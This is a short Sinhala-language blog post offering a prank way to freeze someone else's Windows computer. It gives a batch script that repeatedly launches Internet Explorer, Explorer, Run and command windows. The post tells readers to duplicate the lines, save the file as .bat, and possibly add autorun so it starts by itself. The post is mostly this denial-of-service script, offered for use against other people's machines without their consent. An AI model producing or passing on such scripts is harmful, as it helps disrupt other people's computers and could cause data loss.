කාගේ හරි Computer
එකක් Stuck කරලම
දාන්න පුලුවන් ක්‍රමයක් තමයි මම මේ කියන්න
හදන්නේ, මේකෙන් කාටවත්
කරදරයක් කරන්න එපා, ඒත් පොඩි ජොලි වැඩක්,
@echo off
:A
start iexplore.exe
start run
start explorer
start dir
start command
මෙතන තියන code එකේ start කියල තියෙන ටික පුලුවන් තරම් Copy
කරල Save කර ගන්න,
වැඩියෙන් දැම්මොත්, ඉක්මනින් Stuck වෙයි හේහේ
Ex-:
@echo
off
:A
start
iexplore.exe
start
run
start
explorer
start
dir
start
command
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command
දැන් තියෙන්නේ
මේක Save කරන්න Save as ගිහින් ඕක කැමති නමක් දීලා Save කරන්න
පුලුවන්, ඊට
පිටිපස්සෙන් තියෙන්නේ File එකේ extension එක
මතක් කරල ඔයාල දුන්න නම අවසානෙට මෙහෙම Type කරන්න. .bat
ඔන්න වැඩේ හරි දැන්,
මේක test කරල බලන්න ඕනෙනම් code වැඩිය
දාන්නේ නැතුව test කරල බලන්න. මුකුත් ප්‍රශ්ණයක් වෙන්නේ නැ
මේකෙන් වැඩියෙන් දැම්මොත් අනිවර්යෙන් Stuck වෙනවමයි, හේ හේ, එච්චරයි, මේකටත් Auto run එකක් ලියල
දැම්මනම් ගොඩේ ගොඩ
~~esh~~
No comments:
Post a Comment